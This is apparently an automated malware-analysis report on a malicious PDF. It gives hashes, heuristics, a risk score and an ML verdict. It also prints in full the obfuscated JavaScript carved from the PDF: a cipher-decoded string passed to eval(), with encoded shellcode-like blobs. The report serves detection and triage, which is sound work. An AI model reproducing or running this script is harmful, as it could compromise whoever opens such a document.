Malicious PDF / .PHZ — malware analysis report

Static analysis result for SHA-256 8bc8fe3434b0b1c3…

MALICIOUS

PDF / .PHZ

9.4 KB Created: 2010-05-26 09:52:27 Authoring application: kSwltWptp (via i3oomXB1) First seen: 2026-05-09
MD5: 011d205bff42e0989e07f8906eee48fd SHA-1: 9a84fc8061be3afdd39b13fdcef6e9b6f5c37af9 SHA-256: 8bc8fe3434b0b1c3fc91b33370a72fbd60f082e28e113abf7dcd67b0b73bace6
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_EVAL. The PDF_EVAL heuristic specifically points to an eval() call within the decoded JavaScript stream, suggesting code execution. The presence of obfuscation indicators in the extracted artifact further supports this. While the exact payload is not discernible due to obfuscation, the pattern strongly suggests a downloader attempting to execute a malicious script.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    ABp*pq;\nppLxipaXt)Q >m0{(FDUuSp=pyFKP0g.oVHumnvTUp-p2Y5dHwo,5D5o4Kxw)p+p)E69M;\nppLxip}sgtR5.oh<B6QTwdp=p<RbdFxZb2\"%<o)o)%<o)o)\"M;\npp}sgtR5.oh<B6QTwdp=pE7.x(Ah3mIAu(HP42}sgtR5.oh<B6QTwd1paXt)Q >m0{(FDUuSM;\nppLxip.SB)XhmT>yW4Z(qJp=p2lZv3wYJ6ISF7Ic <p-p)Ec)))))Mp/pyFKP0g.oVHumnvTU;\nppyNip2LxipxAbqqKdb<qJs.L)Np=p);pxAbqqKdb<qJs.L)NpCp.SB)XhmT>yW4Z(qJ;pxAbqqKdb<qJs.L)Np++pMe\npppp7 G)8Jm8ykd}9wO)[xAbqqKdb<qJs.L)N]p=p}sgtR5.oh<B6QTwdp+pHJDDFb7T3w,moUJ8;\nppj\nj\ny<RFA8NRpt5EF)7NbLhJ ltTw2Me\npp …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x242 7993 bytes
SHA-256: 227b06bb437b8d416e2f038dc33c71cd988f34e777bc1717a40caa874bcbcdbb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 110 of 162 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function AFo9XTCbJ(AFo9XTCbJ,Pyre3NDqVAag) {var A1ywBPuzqH=AFo9XTCbJ. substr (Pyre3NDqVAag, 1);return A1ywBPuzqH;}/*J5PG8VvgVoHB1tIlgWl0|doBe4wUk4|tzi0x4lTP*/function ANKiphAQeg1yYE(ZJmSKb3LsM3Obuw9o9) {/*bQIKZtrwV|ByMDTG0nru5ak|RYY3snJJ4RTT*/var MosN5Mt = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*BFWjH[wLe3BHk]DBXiSv6MdkVmfn6zo*//*ABhCMUOrNPzyC3zZbIKX|o8qQdTNS7L|AtQMDe3Q*/var BH1zhBc0M3tXm6Q1X /*sFwl4LDDWaXAYDR2[eKVqYUZogc]Zt2Izpu*/= new String("Cf2Mejpr1vITHU7nmhOYa3ku{,JtWw>g}PSx.FDby(B8Gz 4RNZ5idA<L0Els)Qq6cKVX9o");/*AxxNOKNmOffm9p7p|RFsyi|OStWHZH1Q4odJzrwEM*/for(nXpmi=0;nXpmi<MosN5Mt.length;nXpmi++) {if(ZJmSKb3LsM3Obuw9o9 == AFo9XTCbJ(BH1zhBc0M3tXm6Q1X, nXpmi)) {/*qM6n2A57s[fj7xTU5sbw8WacfP]RUWjAif*/return AFo9XTCbJ(MosN5Mt, nXpmi);/*agjYOS4yQrHkn0B <zY0R3GbLayu]XQFywoMB7Gz*/}}return ZJmSKb3LsM3Obuw9o9;}/*y7xbxz1m[r4HxWSOK]piUuW*//*ZiIXp8|d6Y5uOwXbdRjRo|fy5KWQ5tXVRgs6fTab*/var HPgo2e3 = new String;var b8yaWId = new String("\nLxip7 G)8Jm8ykd}9wO)p=pRb0pviixl2M;\nLxipAGJz>NO)athPGX>t;\ny<RFA8NRpE7.x(Ah3mIAu(HP42}sgtR5.oh<B6QTwd1paXt)Q >m0{(FDUuSMe\npp0B8 bp2}sgtR5.oh<B6QTwdr bR(ABp*pqpCpaXt)Q >m0{(FDUuSMe\npppp}sgtR5.oh<B6QTwdp+=p}sgtR5.oh<B6QTwd;\nppj\npp}sgtR5.oh<B6QTwdp=p}sgtR5.oh<B6QTwdrd<.dAi8R(2)1paXt)Q >m0{(FDUuSp/pqM;\nppibA<iRp}sgtR5.oh<B6QTwd;\nj\ny<RFA8NRp L6q4b)VPi9SKFJg2D<yGyIQFxB7HLbR)Me\nppLxiplZv3wYJ6ISF7Ic <p=p)E)F)F)F)F;\nppLxipHJDDFb7T3w,moUJ8p=p<RbdFxZb2\"%<c6c6%<c6c6%<c6c6%<)7UI%<66KI%<VVTo%<9)Io%<9))Q%<U766%<Uqc6%<UI7v%<U9)K%<77UT%<7777%<9IX7%<H7cU%<U7U7%<VcU7%<U6v7%<o7Vc%<cq76%<o7Vc%<VUUX%<U7)6%<U7UI%<VcU7%<Io)6%<VQ9X%<UQvQ%<)X)6%<U7QQ%<U7U7%<vvVV%<IoUI%<XX9X%<VKQQ%<)XUQ%<U7Q7%<U7U7%<vvVV%<IoUX%<Tv9X%<Q)K7%<)XqH%<U7)H%<U7U7%<vvVV%<IoU6%<))9X%<)7qQ%<)X97%<U76I%<U7U7%<vvVV%<Io77%<qU9X%<)voV%<)XKX%<U7qo%<U7U7%<vvVV%<v77I%<HXV7%<ovqT%<VVQK%<7Xvv%<U9)V%<U7UU%<IQU7%<ovVV%<VcTI%<UIvv%<UU9K%<VcIV%<7XIv%<)XIo%<U7Vc%<U7U7%<9XI7%<7KHo%<o7T)%<X9)X%<U7U7%<VVU7%<76vv%<qvVc%<q7VT%<VVI7%<T7vv%<Q)9X%<U7U7%<I7U7%<vvVc%<9K7I%<IVUH%<IvVc%<)X7X%<U79U%<U7U7%<vvUT%<q9T7%<I6U7%<TQoQ%<q99v%<UIv7%<9voX%<U7U7%<ovQ)%<VcT7%<U6vv%<UU9K%<VcIV%<7XIv%<v7)X%<U7U7%<9KU7%<IXU9%<vvUT%<HTTI%<IT6c%<Q)IT%<T7ov%<ITI7%<vvVc%<9K76%<IVUv%<IvVc%<)X7X%<U7TT%<U7U7%<U79K%<ovQ)%<VcT7%<UXvv%<UH9K%<VcIV%<7XIv%<77)X%<U7U7%<9KU7%<VcQ)%<77vv%<UU9K%<VcIV%<7XIv%<U7)X%<U7U7%<vUU7%<IHIc%<)UUT%<)UUT%<)UUT%<)UUT%<)6VT%<IKUI%<VcIT%<)H6K%<IHQ9%<)7Q)%<VcIv%<Vc)6%<UXoq%<IqVc%<IoU6%<oTVc%<VcH6%<7QoI%<UToX%<IoQT%<ooVc%<UTT7%<HTQT%<vVqV%<cqvU%<qTUT%<HTIo%<U)Qo%<77KQ%<QHHK%<UXoI%<qQqU%<UTUq%<v7QH%<QU)c%<QQHc%<ovIQ%<IK)v%<)cVc%<IKVc%<UTTI%<9o6q%<U6Vc%<Vcvc%<76IK%<6qUT%<UIVc%<UTVc%<IQqv%<qHIq%<U7UX%<QI)X%<Q)QQ%<IvQ)%<v6IH%<v)vq%<U7vQ%<XcV9%<X)Xc%<q76v%<Vcq7%<VH6)%<6QVQ%<X6VU%<VoqU%<VVVU%<q7V7%<VTVq%<VXV7%<VTq7%<VQV7%<qUVc%<V9X)%<67X)%<VcVo%<6o6H%<))6K\"M;\npp8yp2D<yGyIQFxB7HLbR)p==pQMe\npppplZv3wYJ6ISF7Ic <p=p)E6)6)6)6);\nppppHJDDFb7T3w,moUJ8p=p<RbdFxZb2\"%<c6c6%<c6c6%<c6c6%<)7UI%<66KI%<VVTo%<9)Io%<9))Q%<U766%<Uqc6%<UI7v%<U9)K%<77UT%<7777%<9IX7%<H7cU%<U7U7%<VcU7%<U6v7%<o7Vc%<cq76%<o7Vc%<VUUX%<U7)6%<U7UI%<VcU7%<Io)6%<VQ9X%<UQvQ%<)X)6%<U7QQ%<U7U7%<vvVV%<IoUI%<XX9X%<VKQQ%<)XUQ%<U7Q7%<U7U7%<vvVV%<IoUX%<Tv9X%<Q)K7%<)XqH%<U7)H%<U7U7%<vvVV%<IoU6%<))9X%<)7qQ%<)X97%<U76I%<U7U7%<vvVV%<Io77%<qU9X%<)voV%<)XKX%<U7qo%<U7U7%<vvVV%<v77I%<HXV7%<ovqT%<VVQK%<7Xvv%<U9)V%<U7UU%<IQU7%<ovVV%<VcTI%<UIvv%<UU9K%<VcIV%<7XIv%<)XIo%<U7Vc%<U7U7%<9XI7%<7KHo%<o7T)%<X9)X%<U7U7%<VVU7%<76vv%<qvVc%<q7VT%<VVI7%<T7vv%<Q)9X%<U7U7%<I7U7%<vvVc%<9K7I%<IVUH%<IvVc%<)X7X%<U79U%<U7U7%<vvUT%<q9T7%<I6U7%<TQoQ%<q99v%<UIv7%<9voX%<U7U7%<ovQ)%<VcT7%<U6vv%<UU9K%<VcIV%<7XIv%<v7)X%<U7U7%<9KU7%<IXU9%<vvUT%<HTTI%<IT6c%<Q)IT%<T7ov%<ITI7%<vvVc%<9K76%<IVUv%<IvVc%<)X7X%<U7TT%<U7U7%<U79K%<ovQ)%<VcT7%<UXvv%<UH9K%<VcIV%<7XIv%<77)X%<U7U7%<9KU7%<VcQ)%<77vv%<UU9K%<VcIV%<7XIv%<U7)X%<U7U7%<vUU7%<IHIc%<)UUT%<)UUT%<)UUT%<)UUT%<)6VT%<IKUI%<VcIT%<)H6K%<IHQ9%<)7Q)%<VcIv%<Vc)6%<UXoq%<IqVc%<IoU6%<oTVc%<VcH6%<7QoI%<UToX%<IoQT%<ooVc%<UTT7%<HTQT%<vVqV%<cqvU%<qTUT%<HTIo%<U)Qo%<77KQ%<QHHK%<UXoI%<qQqU%<UTUq%<v7QH%<QU)c%<QQHc%<ovIQ%<IK)v%<)cVc%<IKVc%<UTTI%<9o6q%<U6Vc%<Vcvc%<76IK%<6qUT%<UIVc%<UTVc%<IQqv%<qHIq%<U7UX%<QI)X%<Q)QQ%<IvQ)%<v6IH%<v)vq%<U7vQ%<XcV9%<X)Xc%<q76v%<Vcq7%<VH6)%<6QVQ%<X6VU%<VoqU%<VVVU%<q7V7%<VTVq%<VXV7%<VTq7%<VQV7%<qUVc%<V9X)%<67X)%<VcVo%<6o6H%<))6K\"M;\nppj\nppb dbp8yp2D<yGyIQFxB7HLbR)p==pqMe\nppppHJDDFb7T3w,moUJ8p=p<RbdFxZb2\"%<c6c6%<c6c6%<c6c6%<)7UI%<66KI%<VVTo%<9)Io%<9))Q%<U766%<Uqc6%<UI7v%<U9)K%<77UT%<7777%<9IX7%<H7cU%<U7U7%<VcU7%<U6v7%<o7Vc%<cq76%<o7Vc%<VUUX%<U7)6%<U7UI%<VcU7%<Io)6%<VQ9X%<UQvQ%<)X)6%<U7QQ%<U7U7%<vvVV%<IoUI%<XX9X%<VKQQ%<)XUQ%<U7Q7%<U7U7%<vvVV%<IoUX%<Tv9X%<Q)K7%<)XqH%<U7)H%<U7U7%<vvVV%<IoU6%<))9X%<)7qQ%<)X97%<U76I%<U7U7%<vvVV%<Io77%<qU9X%<)voV%<)XKX%<U7qo%<U7U7%<vvVV%<v77I%<HXV7%<ovqT%<VVQK%<7Xvv%<U9)V%<U7UU%<IQU7%<ovVV%<VcTI%<UIvv%<UU9K%<VcIV%<7XIv%<)XIo%<U7Vc%<U7U7%<9XI7%<7KHo%<o7T)%<X9)X%<U7U7%<VVU7%<76vv%<qvVc%<q7VT%<VVI7%<T7vv%<Q)9X%<U7U7%<I7U7%<vvVc%<9K7I%<IVUH%<IvVc%<)X7X%<U79U%<U7U7%<vvUT%<q9T7%<I6U7%<TQoQ%<q99v%<UIv7%<9voX%<U7U7%<ovQ)%<VcT7%<U6vv%<UU9K%<VcIV%<7XIv%<v7)X%<U7U7%<9KU7%<IXU9%<vvUT%<HTTI%<IT6c%<Q)IT%<T7ov%<ITI7%<vvVc%<9K76%<IVUv%<IvVc%<)X7X%<U7TT%<U7U7%<U79K%<ovQ)%<VcT7%<UXvv%<UH9K%<VcIV%<7XIv%<77)X%<U7U7%<9KU7%<VcQ)%<77vv%<UU9K%<VcIV%<7XIv%<U7)X%<U7U7%<vUU7%<IHIc%<)UUT%<)UUT%<)UUT%<)UUT%<)6VT%<IKUI%<VcIT%<)H6K%<IHQ9%<)7Q)%<VcIv%<Vc)6%<UXoq%<IqVc%<IoU6%<oTVc%<VcH6%<7QoI%<UToX%<IoQT%<ooVc%<UTT7%<HTQT%<vVqV%<cqvU%<qTUT%<HTIo%<U)Qo%<77KQ%<QHHK%<UXoI%<qQqU%<UTUq%<v7QH%<QU)c%<QQHc%<ovIQ%<IK)v%<)cVc%<IKVc%<UTTI%<9o6q%<U6Vc%<Vcvc%<76IK%<6qUT%<UIVc%<UTVc%<IQqv%<qHIq%<U7UX%<QI)X%<Q)QQ%<IvQ)%<v6IH%<v)vq%<U7vQ%<XcV9%<X)Xc%<q76v%<Vcq7%<VH6)%<6QVQ%<X6VU%<VoqU%<VVVU%<q7V7%<VTVq%<VXV7%<VTq7%<VQV7%<qUVc%<V9X)%<67X)%<VcVo%<6o6H%<))6K\"M;\nppj\nppLxipyFKP0g.oVHumnvTUp=p)Ec)))));\nppLxipY5dHwo,5D5o4Kxw)p=pHJDDFb7T3w,moUJ8r bR(ABp*pq;\nppLxipaXt)Q >m0{(FDUuSp=pyFKP0g.oVHumnvTUp-p2Y5dHwo,5D5o4Kxw)p+p)E69M;\nppLxip}sgtR5.oh<B6QTwdp=p<RbdFxZb2\"%<o)o)%<o)o)\"M;\npp}sgtR5.oh<B6QTwdp=pE7.x(Ah3mIAu(HP42}sgtR5.oh<B6QTwd1paXt)Q >m0{(FDUuSM;\nppLxip.SB)XhmT>yW4Z(qJp=p2lZv3wYJ6ISF7Ic <p-p)Ec)))))Mp/pyFKP0g.oVHumnvTU;\nppyNip2LxipxAbqqKdb<qJs.L)Np=p);pxAbqqKdb<qJs.L)NpCp.SB)XhmT>yW4Z(qJ;pxAbqqKdb<qJs.L)Np++pMe\npppp7 G)8Jm8ykd}9wO)[xAbqqKdb<qJs.L)N]p=p}sgtR5.oh<B6QTwdp+pHJDDFb7T3w,moUJ8;\nppj\nj\ny<RFA8NRpt5EF)7NbLhJ ltTw2Me\nppLxip55>k<k6ZuWZQ{lNLp=p);\nppLxip44}lq3D0bKBFgA9dp=pxZZrL8b0bi>bid8NRrANtAi8R(2M;\nppxZZrF bxiW84bu<A2AGJz>NO)athPGX>tM;\n\npp8yp244}lq3D0bKBFgA9dpCpXrQMe\npppp L6q4b)VPi9SKFJg2)M;\nppppLxipvFnbQOw{RO,HhU)9p=p<RbdFxZb2\"%<)F)F%<)F)F\"M;\npppp0B8 bp2vFnbQOw{RO,HhU)9r bR(ABpCpccoKqMvFnbQOw{RO,HhU)9p+=pvFnbQOw{RO,HhU)9;\nppppAB8dprFN  x.tANibp=pTN  x.rFN  bFAU4x8 hRyN2e\nppppppd<.Gp:p\"\"1p4d(p:pvFnbQOw{RO,HhU)9\nppppj\nppppM;\nppj\n8yp244}lq3D0bKBFgA9dpf=poMe\nppppAilpe\n8yp2xZZrDNFrTN  x.r(bAhFNRMe\npppppppp L6q4b)VPi9SKFJg2qM;\nppppppppLxipHBV6c8sBR(OOx,TYp=p<RbdFxZb2\"%)o\"M;\npppppppp0B8 bp2HBV6c8sBR(OOx,TYr bR(ABpCp)Ec)))MHBV6c8sBR(OOx,TYp+=pHBV6c8sBR(OOx,TY;\nppppppppHBV6c8sBR(OOx,TYp=p\"kr\"p+pHBV6c8sBR(OOx,TY;\nxZZrDNFrTN  x.r(bAhFNR2HBV6c8sBR(OOx,TYM;\npppppppp55>k<k6ZuWZQ{lNLp=pQ;\nppppppj\nppppppb dbpe\npppppppp55>k<k6ZuWZQ{lNLp=pQ;\nppppppj\nppppj\nppppFxAFBp2bMe\npppppp55>k<k6ZuWZQ{lNLp=pQ;\nppppj\npppp8yp255>k<k6ZuWZQ{lNLp==pQMe\npppppp8yp2244}lq3D0bKBFgA9dpf=pXrQ&&p44}lq3D0bKBFgA9dpCpoMMe\npppppppp L6q4b)VPi9SKFJg2QM;\nppppppppLxipGWsKRwW.N<ZXolUvp=p\"Qqoooooooooooooooooo\";\nppppppppyNip2iOTG6I,Zdz)WI3N7p=p);piOTG6I,Zdz)WI3N7pCpqXV;piOTG6I,Zdz)WI3N7p++pMe\nppppppppppGWsKRwW.N<ZXolUvp+=p\"9\";\nppppppppj\npppppppp<A8 rZi8RAy2\"%cK)))y\"1pGWsKRwW.N<ZXolUvM;\nppppppj\nppppj\nppj\nj\nxZZrRNODhR7XBKH56JQ8p=pt5EF)7NbLhJ ltTw;\nAGJz>NO)athPGX>tp=pxZZrdbAW84bu<A2\"xZZrRNODhR7XBKH56JQ82M\"1pQ)M;\n");/*VL6HiXl062eyXTui{AeZXzr3hnZ0E0iZ}ehk2I*//*zA5oYPY75ZbU|RBrzpGqt6OJ8tqjmy|cz7GO*/for(S7DGoh92lqNmGtxO9=0;S7DGoh92lqNmGtxO9<b8yaWId.length;S7DGoh92lqNmGtxO9++)HPgo2e3 += ANKiphAQeg1yYE(AFo9XTCbJ(b8yaWId,S7DGoh92lqNmGtxO9));eval(HPgo2e3);/*fLH4nbr5[ZuIfa2bpCaYt]BiCdX*/

Open this report in the interactive analyzer, or submit your own file for analysis.